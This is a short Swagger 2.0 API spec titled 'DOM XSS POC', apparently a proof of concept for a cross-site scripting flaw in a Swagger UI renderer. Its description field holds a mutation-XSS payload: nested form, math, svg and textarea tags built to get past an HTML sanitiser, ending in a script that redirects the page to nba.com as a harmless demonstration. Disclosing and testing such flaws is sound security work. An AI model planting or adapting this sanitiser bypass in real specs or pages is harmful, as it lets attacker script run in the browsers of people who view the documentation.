swagger: '2.0'
info:
  version: "0.0.1"
  title: DOM XSS POC
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>location.href = 'https://www.nba.com';</script></form>
paths:
  /:
    get:
      responses:
        200:
          description: Success
